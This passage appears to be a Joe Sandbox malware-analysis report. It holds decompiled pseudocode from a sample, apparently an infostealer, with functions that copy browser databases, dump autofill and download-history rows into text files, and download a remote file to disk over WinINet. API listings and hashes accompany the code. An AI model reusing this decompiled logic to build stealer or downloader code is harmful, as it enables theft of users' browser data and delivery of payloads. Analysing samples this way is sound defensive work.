                                                                    				E00404396(_t198 - 0x74c, _t203, _t198 - 0x11c, _t107 - _t192);
                                                                    				 *(_t198 - 4) = 0;
                                                                    				_t113 = E004160E8(_t198 - 0x74c, _t198 - 0x7bc);
                                                                    				if(_t113[0xa] >= 8) {
                                                                    					_t113 =  *_t113;
                                                                    				}
                                                                    				_t114 = GetFileAttributesW(_t113);
                                                                    				if(_t114 == 0xffffffff) {
                                                                    					L10:
                                                                    					 *((intOrPtr*)(_t198 - 0x7c8)) = _t154;
                                                                    				} else {
                                                                    					 *((intOrPtr*)(_t198 - 0x7c8)) = 1;
                                                                    					if((_t114 & 0x00000010) != 0) {
                                                                    						goto L10;
                                                                    					}
                                                                    				}
                                                                    				E0040C148(0, _t198 - 0x7bc, 1);
                                                                    				 *(_t198 - 4) =  *(_t198 - 4) | 0xffffffff;
                                                                    				E00404354(_t198 - 0x74c, 1, _t154);
                                                                    				_t207 =  *((intOrPtr*)(_t198 - 0x7c8)) - _t154;
                                                                    				if( *((intOrPtr*)(_t198 - 0x7c8)) != _t154) {
                                                                    					_push(_t198 - 0x7c0);
                                                                    					_push(_t198 - 0x11c);
                                                                    					_t121 = E0040E6CB(_t154, _t198 - 0x7c4, 0, 1, _t207);
                                                                    					_t208 = _t121;
                                                                    					if(_t121 != 0) {
                                                                    						 *((intOrPtr*)(_t198 - 0x754)) = 0xf;
                                                                    						 *((intOrPtr*)(_t198 - 0x758)) = _t154;
                                                                    						 *((char*)(_t198 - 0x768)) = _t154;
                                                                    						E00404331(_t198 - 0x768,  *((intOrPtr*)(_t198 - 0x7d8)));
                                                                    						_push(_t198 - 0x768);
                                                                    						_push(_t198 - 0x730);
                                                                    						 *(_t198 - 4) = 1;
                                                                    						E00415D13(_t154, _t198 - 0x768, 0, 1, _t208);
                                                                    						 *(_t198 - 4) = 3;
                                                                    						E00404354(_t198 - 0x768, 1, _t154);
                                                                    						_t170 = 0x104;
                                                                    						_t127 = _t198 - 0x32c;
                                                                    						do {
                                                                    							 *_t127 = _t154;
                                                                    							_t127 = _t127 + 1;
                                                                    							_t170 = _t170 - 1;
                                                                    						} while (_t170 != 0);
                                                                    						lstrcatA(_t198 - 0x32c,  *0x445a84);
                                                                    						if(E0040C00F(_t198 - 0x730, _t198 - 0x32c, _t154) != 0xffffffff) {
                                                                    							E0040453E(_t198 - 0x730, _t154, _t132 + 0xc);
                                                                    							_t173 = _t198 - 0x730;
                                                                    							E0040453E(_t198 - 0x730, 0x78, 0xffffffff);
                                                                    							_t137 =  *(_t198 - 0x730);
                                                                    							if( *((intOrPtr*)(_t198 - 0x71c)) < 0x10) {
                                                                    								_t137 = _t198 - 0x730;
                                                                    							}
                                                                    							_t190 = _t198 - 0x7cc;
                                                                    							if(E0040E575(_t198 - 0x7d0, _t173, _t198 - 0x7cc, _t137) != 0) {
                                                                    								_t175 = 0x3e8;
                                                                    								_t139 = _t198 - 0x714;
                                                                    								do {
                                                                    									 *_t139 = 0;
                                                                    									_t139 = _t139 + 1;
                                                                    									_t175 = _t175 - 1;
                                                                    									_t213 = _t175;
                                                                    								} while (_t175 != 0);
                                                                    								_push( *((intOrPtr*)(_t198 - 0x7c4)));
                                                                    								_push( *((intOrPtr*)(_t198 - 0x7cc)));
                                                                    								_t140 = E0040E874(_t198 - 0x784,  *((intOrPtr*)(_t198 - 0x7c0)),  *((intOrPtr*)(_t198 - 0x7d0)), _t190, 1, _t213);
                                                                    								 *(_t198 - 4) = 4;
                                                                    								if(_t140[0x14] >= 0x10) {
                                                                    									_t140 =  *_t140;
                                                                    								}
                                                                    								lstrcatA(_t198 - 0x714, _t140);
                                                                    								 *(_t198 - 4) = 3;
                                                                    								E00404354(_t198 - 0x784, 1, 0);
                                                                    								_t197 =  *(_t198 - 0x7d4);
                                                                    								lstrcatA(_t197,  *0x445e80);
                                                                    								_push("NULL");
                                                                    								_push(_t198 - 0x714);
                                                                    								if( *0x446458() != 0) {
                                                                    									_push( *((intOrPtr*)(_t198 - 0x7c4)));
                                                                    									_push( *((intOrPtr*)(_t198 - 0x7cc)));
                                                                    									_t147 = E0040E874(_t198 - 0x7a0,  *((intOrPtr*)(_t198 - 0x7c0)),  *((intOrPtr*)(_t198 - 0x7d0)), _t190, _t197, __eflags);
                                                                    									 *(_t198 - 4) = 5;
                                                                    									__eflags = _t147[0x14] - 0x10;
                                                                    									if(_t147[0x14] >= 0x10) {
                                                                    										_t147 =  *_t147;
                                                                    									}
                                                                    									lstrcatA(_t197, _t147);
                                                                    									 *(_t198 - 4) = 3;
                                                                    									E00404354(_t198 - 0x7a0, 1, 0);
                                                                    								} else {
                                                                    									_t151 =  *(_t198 - 0x730);
                                                                    									if( *((intOrPtr*)(_t198 - 0x71c)) < 0x10) {
                                                                    										_t151 = _t198 - 0x730;
                                                                    									}
                                                                    									lstrcatA(_t197, _t151);
                                                                    								}
                                                                    								lstrcatA(_t197, 0x43c8dc);
                                                                    							}
                                                                    							_t154 = 0;
                                                                    						}
                                                                    						 *(_t198 - 4) =  *(_t198 - 4) | 0xffffffff;
                                                                    						E00404354(_t198 - 0x730, 1, _t154);
                                                                    					}
                                                                    				}
                                                                    				E0040E631(_t198 - 0x7c4, _t198 - 0x7c0);
                                                                    				return E00420888(_t154, _t198 - 0x7c4, _t198 - 0x7c0);
                                                                    			}

























                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00408794
                                                                    • lstrcatA.KERNEL32(?,00000000,000007CC,00408C3A,?,00000000), ref: 004087EA
                                                                    • lstrcatA.KERNEL32(?), ref: 004087FD
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408811
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408823
                                                                    • lstrcatA.KERNEL32(?), ref: 00408836
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00408895
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    • lstrcatA.KERNEL32(?,00000001,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408974
                                                                    • lstrcatA.KERNEL32(?,00000000,00000078,000000FF,00000000,-0000000C,?,?,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408A31
                                                                    • lstrcatA.KERNEL32(?,00000001,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408A57
                                                                    • StrCmpCA.SHLWAPI(?,NULL,?,?,?,?,00000001,00000000,00000001), ref: 00408A69
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,00000001,00000000,00000001), ref: 00408A8A
                                                                    • lstrcatA.KERNEL32(?,0043C8DC,00000001,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408AE4
                                                                      • Part of subcall function 0040E874: __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                      • Part of subcall function 0040E874: _memset.LIBCMT ref: 0040E8C9
                                                                      • Part of subcall function 0040E874: LocalAlloc.KERNEL32 ref: 0040E904
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408AC5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$H_prolog3_$AllocAttributesFileLocal_memmove_memset
                                                                    • String ID: NULL
                                                                    • API String ID: 1714093169-324932091
                                                                    • Opcode ID: 309355e712d810ed07439110930016a1af529719f6e9cd2804b494409bc20f41
                                                                    • Instruction ID: c1b642d60342ca033521cd0b8119711ec229398cff7ea87e4473c86e05902e12
                                                                    • Opcode Fuzzy Hash: 309355e712d810ed07439110930016a1af529719f6e9cd2804b494409bc20f41
                                                                    • Instruction Fuzzy Hash: F8A15C71D042299FEF25EB50CD85BD9B7B8EB05314F1040EAE10DA7191DB38AB89CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 51%
                                                                    			E0041001C(CHAR* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v544;
                                                                    				CHAR* _v548;
                                                                    				char _v552;
                                                                    				intOrPtr _v556;
                                                                    				intOrPtr _v560;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t31;
                                                                    				void* _t40;
                                                                    				void* _t52;
                                                                    				void* _t57;
                                                                    				CHAR* _t63;
                                                                    				CHAR* _t64;
                                                                    				void* _t81;
                                                                    				CHAR* _t84;
                                                                    				signed int _t85;
                                                                    				void* _t86;
                                                                    				void* _t89;
                                                                    				void* _t90;
                                                                    				void* _t92;
                                                                    
                                                                    				_t31 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t31 ^ _t85;
                                                                    				_v556 = _a4;
                                                                    				_v548 = _a8;
                                                                    				_v560 = _a12;
                                                                    				_t73 = __ecx;
                                                                    				E00426300( &_v276, 0, 0x104);
                                                                    				lstrcatA( &_v276,  *0x445fe0);
                                                                    				_t40 = 0x1a;
                                                                    				lstrcatA( &_v276, E00415EF6(_t40, _t92));
                                                                    				CopyFileA(_t73,  &_v276, 1);
                                                                    				E00426300( &_v540, 0, 0x104);
                                                                    				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v548, _v556);
                                                                    				_t84 =  *0x445a98; // 0x4c9cb90
                                                                    				_t52 =  *0x446248( &_v276,  &_v552);
                                                                    				_t89 = _t86 + 0x30;
                                                                    				if(_t52 == 0) {
                                                                    					_t57 =  *0x4461fc(_v552, _t84, 0xffffffff,  &_v544, 0);
                                                                    					_t90 = _t89 + 0x14;
                                                                    					if(_t57 == 0) {
                                                                    						_t84 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
                                                                    						while(1) {
                                                                    							_push(_v544);
                                                                    							if( *0x446218() != 0x64) {
                                                                    								break;
                                                                    							}
                                                                    							_t63 =  *0x446238(_v544, 0);
                                                                    							_t73 = _t63;
                                                                    							_t64 =  *0x446238(_v544, 1);
                                                                    							_t90 = _t90 + 0x10;
                                                                    							_v548 = _t64;
                                                                    							lstrcatA(_t84, _t63);
                                                                    							lstrcatA(_t84, "\t");
                                                                    							lstrcatA(_t84, _v548);
                                                                    							lstrcatA(_t84, 0x43c8dc);
                                                                    						}
                                                                    						E0041CE7C(_v560,  &_v540,  *0x446320(_t84), 3);
                                                                    					}
                                                                    					 *0x44621c(_v544);
                                                                    					 *0x44624c(_v552);
                                                                    				}
                                                                    				return E0041DA9B(DeleteFileA( &_v276), _t73, _v8 ^ _t85, _t81, 0, _t84);
                                                                    			}




























                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0041005F
                                                                    • lstrcatA.KERNEL32(?,004132CB,0043C8D8,?), ref: 00410074
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0041008A
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0041009A
                                                                    • _memset.LIBCMT ref: 004100A9
                                                                    • wsprintfA.USER32 ref: 004100C9
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0041011C
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00410123
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00410155
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 00410161
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0041016E
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0041017A
                                                                    • lstrlen.KERNEL32(00000000), ref: 00410193
                                                                    • DeleteFileA.KERNEL32(?), ref: 004101D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \Autofill\%s_%s.txt
                                                                    • API String ID: 3976021866-3770965036
                                                                    • Opcode ID: feac73d224cccc530b82361e90b8a08ac407e886b983509641d44f17f04b081a
                                                                    • Instruction ID: 46b44cf328d46f16eda21532ab2267423a6c0cc384e10963aa6030855d83df24
                                                                    • Opcode Fuzzy Hash: feac73d224cccc530b82361e90b8a08ac407e886b983509641d44f17f04b081a
                                                                    • Instruction Fuzzy Hash: 9E416076900128BBCB11AFA4EC4DEDEBBBCFB0E311F1101A6F505E2161D7759A848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 51%
                                                                    			E0040F6A9(CHAR* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v544;
                                                                    				CHAR* _v548;
                                                                    				char _v552;
                                                                    				intOrPtr _v556;
                                                                    				intOrPtr _v560;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t31;
                                                                    				void* _t40;
                                                                    				void* _t52;
                                                                    				void* _t57;
                                                                    				CHAR* _t63;
                                                                    				CHAR* _t64;
                                                                    				void* _t81;
                                                                    				CHAR* _t84;
                                                                    				signed int _t85;
                                                                    				void* _t86;
                                                                    				void* _t89;
                                                                    				void* _t90;
                                                                    				void* _t92;
                                                                    
                                                                    				_t31 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t31 ^ _t85;
                                                                    				_v556 = _a4;
                                                                    				_v548 = _a8;
                                                                    				_v560 = _a12;
                                                                    				_t73 = __ecx;
                                                                    				E00426300( &_v276, 0, 0x104);
                                                                    				lstrcatA( &_v276,  *0x445fe0);
                                                                    				_t40 = 0x1a;
                                                                    				lstrcatA( &_v276, E00415EF6(_t40, _t92));
                                                                    				CopyFileA(_t73,  &_v276, 1);
                                                                    				E00426300( &_v540, 0, 0x104);
                                                                    				wsprintfA( &_v540, "\\Downloads\\%s_%s.txt", _v548, _v556);
                                                                    				_t84 =  *0x446190; // 0x4c90530
                                                                    				_t52 =  *0x446248( &_v276,  &_v552);
                                                                    				_t89 = _t86 + 0x30;
                                                                    				if(_t52 == 0) {
                                                                    					_t57 =  *0x4461fc(_v552, _t84, 0xffffffff,  &_v544, 0);
                                                                    					_t90 = _t89 + 0x14;
                                                                    					if(_t57 == 0) {
                                                                    						_t84 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
                                                                    						while(1) {
                                                                    							_push(_v544);
                                                                    							if( *0x446218() != 0x64) {
                                                                    								break;
                                                                    							}
                                                                    							_t63 =  *0x446238(_v544, 0);
                                                                    							_t73 = _t63;
                                                                    							_t64 =  *0x446238(_v544, 1);
                                                                    							_t90 = _t90 + 0x10;
                                                                    							_v548 = _t64;
                                                                    							lstrcatA(_t84, _t63);
                                                                    							lstrcatA(_t84, 0x43c8dc);
                                                                    							lstrcatA(_t84, _v548);
                                                                    							lstrcatA(_t84, "\n\n");
                                                                    						}
                                                                    						E0041CE7C(_v560,  &_v540,  *0x446320(_t84), 3);
                                                                    					}
                                                                    					 *0x44621c(_v544);
                                                                    					 *0x44624c(_v552);
                                                                    				}
                                                                    				return E0041DA9B(DeleteFileA( &_v276), _t73, _v8 ^ _t85, _t81, 0, _t84);
                                                                    			}

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040F6EC
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040F701
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040F717
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040F727
                                                                    • _memset.LIBCMT ref: 0040F736
                                                                    • wsprintfA.USER32 ref: 0040F756
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040F7A9
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F7B0
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F7E2
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F7EE
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040F7FB
                                                                    • lstrcatA.KERNEL32(00000000,0043EC3C), ref: 0040F807
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F820
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F861
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \Downloads\%s_%s.txt
                                                                    • API String ID: 3976021866-1964744946
                                                                    • Opcode ID: 108f5294c399d615b1ec86604388fed68030af679c65817414bb443450f9322a
                                                                    • Instruction ID: 93854743b5508c7da544320bb17b2dd8ee1c47936068203f90cfedc8e204cd6a
                                                                    • Opcode Fuzzy Hash: 108f5294c399d615b1ec86604388fed68030af679c65817414bb443450f9322a
                                                                    • Instruction Fuzzy Hash: 4D414076900118BBCB11AFA4EC4DEDEBB78FB0E311F1101B6F605E2161DB759A848F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 27%
                                                                    			E0040F346(CHAR* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v544;
                                                                    				char _v548;
                                                                    				intOrPtr _v552;
                                                                    				intOrPtr _v556;
                                                                    				intOrPtr _v560;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t29;
                                                                    				void* _t38;
                                                                    				void* _t82;
                                                                    				CHAR* _t85;
                                                                    				signed int _t86;
                                                                    				void* _t93;
                                                                    
                                                                    				_t71 = __ebx;
                                                                    				_t29 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t29 ^ _t86;
                                                                    				_v556 = _a4;
                                                                    				_v552 = _a8;
                                                                    				_v560 = _a12;
                                                                    				E00426300( &_v276, 0, 0x104);
                                                                    				lstrcatA( &_v276,  *0x445fe0);
                                                                    				_t38 = 0x1a;
                                                                    				lstrcatA( &_v276, E00415EF6(_t38, _t93));
                                                                    				CopyFileA(__ebx,  &_v276, 1);
                                                                    				E00426300( &_v540, 0, 0x104);
                                                                    				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v552, _v556);
                                                                    				_t85 =  *0x4460e4; // 0x4c90500
                                                                    				_push( &_v548);
                                                                    				_push( &_v276);
                                                                    				if( *0x446248() == 0) {
                                                                    					_push(0);
                                                                    					_push( &_v544);
                                                                    					_push(0xffffffff);
                                                                    					_push(_t85);
                                                                    					_push(_v548);
                                                                    					if( *0x4461fc() == 0) {
                                                                    						_t85 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
                                                                    						while(1) {
                                                                    							_push(_v544);
                                                                    							if( *0x446218() != 0x64) {
                                                                    								break;
                                                                    							}
                                                                    							lstrcatA(_t85,  *0x446238(_v544, 0));
                                                                    							lstrcatA(_t85, " ");
                                                                    							lstrcatA(_t85,  *0x446238(_v544, 1));
                                                                    							lstrcatA(_t85, 0x43c8dc);
                                                                    						}
                                                                    						E0041CE7C(_v560,  &_v540,  *0x446320(_t85), 3);
                                                                    					}
                                                                    					 *0x44621c(_v544);
                                                                    					 *0x44624c(_v548);
                                                                    				}
                                                                    				return E0041DA9B(DeleteFileA( &_v276), _t71, _v8 ^ _t86, _t82, 0, _t85);
                                                                    			}

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040F386
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040F39B
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?), ref: 0040F3B1
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040F3C1
                                                                    • _memset.LIBCMT ref: 0040F3D0
                                                                    • wsprintfA.USER32 ref: 0040F3F0
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040F443
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F44A
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F465
                                                                    • lstrcatA.KERNEL32(00000000,0043F0DC), ref: 0040F471
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F489
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F495
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F4AE
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F4EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \Autofill\%s_%s.txt
                                                                    • API String ID: 3976021866-3770965036
                                                                    • Opcode ID: 93fa9149362658374381cfa51570d99bb74ee8b793827b65e81f921bb222b050
                                                                    • Instruction ID: aabe5698964a7114d595a980c26595edce8cd510aadbdb82e2657ea6f526c2b1
                                                                    • Opcode Fuzzy Hash: 93fa9149362658374381cfa51570d99bb74ee8b793827b65e81f921bb222b050
                                                                    • Instruction Fuzzy Hash: E2416D76900118BFCB21ABA4EC4DEDEBB78EB0E311F1100B6F905E2161DB749A848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 48%
                                                                    			E0040D708(char* __ecx, void* __edx) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t35;
                                                                    				int _t38;
                                                                    				char* _t61;
                                                                    				void* _t62;
                                                                    				void* _t67;
                                                                    				void* _t70;
                                                                    				void* _t71;
                                                                    				void* _t74;
                                                                    				signed int _t75;
                                                                    				void* _t77;
                                                                    
                                                                    				_t67 = __edx;
                                                                    				_t75 = _t77 - 0x4a4;
                                                                    				_t35 =  *0x443674; // 0x393162b1
                                                                    				 *(_t75 + 0x4a0) = _t35 ^ _t75;
                                                                    				_t61 = __ecx;
                                                                    				 *(_t75 - 0x80) =  *(_t75 + 0x4ac);
                                                                    				 *(_t75 - 0x74) = 0;
                                                                    				 *(_t75 - 0x78) = 0x100;
                                                                    				_t38 = InternetOpenA(0x43c8d8, 1, 0, 0, 0);
                                                                    				 *(_t75 - 0x70) = _t38;
                                                                    				if(_t38 != 0) {
                                                                    					_push("https");
                                                                    					_push(E0040D694(__ecx, 0x100, 0));
                                                                    					if( *0x446458() == 0) {
                                                                    						 *(_t75 - 0x74) = 1;
                                                                    					}
                                                                    					 *((intOrPtr*)(_t75 - 0x6c)) = 0;
                                                                    					do {
                                                                    						_push(0);
                                                                    						if( *(_t75 - 0x74) == 0) {
                                                                    							_push(0x100);
                                                                    						} else {
                                                                    							_push(0x800100);
                                                                    						}
                                                                    						 *(_t75 - 0x64) = InternetOpenUrlA( *(_t75 - 0x70), _t61, 0, 0, ??, ??);
                                                                    						if(HttpQueryInfoA( *(_t75 - 0x64), 0x13, _t75 + 0x3a0, _t75 - 0x78, 0) == 0) {
                                                                    							goto L10;
                                                                    						} else {
                                                                    							_push("200");
                                                                    							_push(_t75 + 0x3a0);
                                                                    							if( *0x446458() != 0) {
                                                                    								Sleep(0x3e8);
                                                                    								goto L10;
                                                                    							}
                                                                    						}
                                                                    						break;
                                                                    						L10:
                                                                    						 *((intOrPtr*)(_t75 - 0x6c)) =  *((intOrPtr*)(_t75 - 0x6c)) + 1;
                                                                    					} while ( *((intOrPtr*)(_t75 - 0x6c)) < 3);
                                                                    					_t71 = CreateFileA( *(_t75 - 0x80), 0x40000000, 3, 0, 2, 0x80, 0);
                                                                    					while(InternetReadFile( *(_t75 - 0x64), _t75 - 0x60, 0x400, _t75 - 0x68) != 0) {
                                                                    						if( *(_t75 - 0x68) <= 0 || WriteFile(_t71, _t75 - 0x60,  *(_t75 - 0x68), _t75 - 0x7c, 0) != 0 &&  *(_t75 - 0x68) ==  *(_t75 - 0x7c)) {
                                                                    							if( *(_t75 - 0x68) >= 0x400) {
                                                                    								continue;
                                                                    							}
                                                                    						}
                                                                    						break;
                                                                    					}
                                                                    					E00426300(_t75 - 0x60, 0, 0x400);
                                                                    					CloseHandle(_t71);
                                                                    					InternetCloseHandle( *(_t75 - 0x64));
                                                                    					_t38 = InternetCloseHandle( *(_t75 - 0x70));
                                                                    				}
                                                                    				_pop(_t70);
                                                                    				_pop(_t74);
                                                                    				_pop(_t62);
                                                                    				return E0041DA9B(_t38, _t62,  *(_t75 + 0x4a0) ^ _t75, _t67, _t70, _t74);
                                                                    			}

















                                                                    APIs
                                                                    • InternetOpenA.WININET(0043C8D8,00000001,00000000,00000000,00000000), ref: 0040D748
                                                                      • Part of subcall function 0040D694: _memset.LIBCMT ref: 0040D6AF
                                                                      • Part of subcall function 0040D694: _memset.LIBCMT ref: 0040D6BC
                                                                      • Part of subcall function 0040D694: lstrlen.KERNEL32(00000000,10000000,?), ref: 0040D6E2
                                                                      • Part of subcall function 0040D694: InternetCrackUrlA.WININET(00000000,00000000), ref: 0040D6EA
                                                                    • StrCmpCA.SHLWAPI(00000000,https), ref: 0040D764
                                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,00000100,00000000), ref: 0040D78C
                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040D7A6
                                                                    • StrCmpCA.SHLWAPI(?,200), ref: 0040D7BC
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D7CB
                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0040D7ED
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D80E
                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0040D831
                                                                    • _memset.LIBCMT ref: 0040D841
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040D84A
                                                                    • InternetCloseHandle.WININET(?), ref: 0040D853
                                                                    • InternetCloseHandle.WININET(?), ref: 0040D85C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$CloseFileHandle_memset$Open$CrackCreateHttpInfoQueryReadSleepWritelstrlen
                                                                    • String ID: 200$https
                                                                    • API String ID: 1246493084-2945048398
                                                                    • Opcode ID: 813b0a1d36ad4756c26ff7a7086154858533a4ab01b242261a442c48494a4aa6
                                                                    • Instruction ID: 8e8014ae1652a0f9a123a9585a6d4da9dbdcaa0db3a0f6ab633003790f0059d4
                                                                    • Opcode Fuzzy Hash: 813b0a1d36ad4756c26ff7a7086154858533a4ab01b242261a442c48494a4aa6
                                                                    • Instruction Fuzzy Hash: E7410CB1E00218AFDB219FA1DC88EEE7BBCFB06755F10003AF919A7191D7745944CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 83%
                                                                    			E00412FC2(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                    				signed int _v8;
                                                                    				char _v5008;
                                                                    				CHAR* _v5012;
                                                                    				signed int _t13;
                                                                    				CHAR* _t15;
                                                                    				void* _t16;
                                                                    				struct HINSTANCE__* _t31;
                                                                    				void* _t43;
                                                                    				CHAR* _t45;
                                                                    				signed int _t49;
                                                                    				intOrPtr _t55;
                                                                    				intOrPtr _t56;
                                                                    				intOrPtr _t57;
                                                                    				intOrPtr _t58;
                                                                    				intOrPtr _t59;
                                                                    				intOrPtr _t60;
                                                                    
                                                                    				_t46 = __esi;
                                                                    				_t44 = __edi;
                                                                    				_t43 = __edx;
                                                                    				_t39 = __ebx;
                                                                    				E0042E300(0x1390);
                                                                    				_t13 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t13 ^ _t49;
                                                                    				_t15 =  *0x445fe0; // 0x4c99228
                                                                    				_v5012 = _t15;
                                                                    				if(_t15 == 0) {
                                                                    					_t16 = 0;
                                                                    				} else {
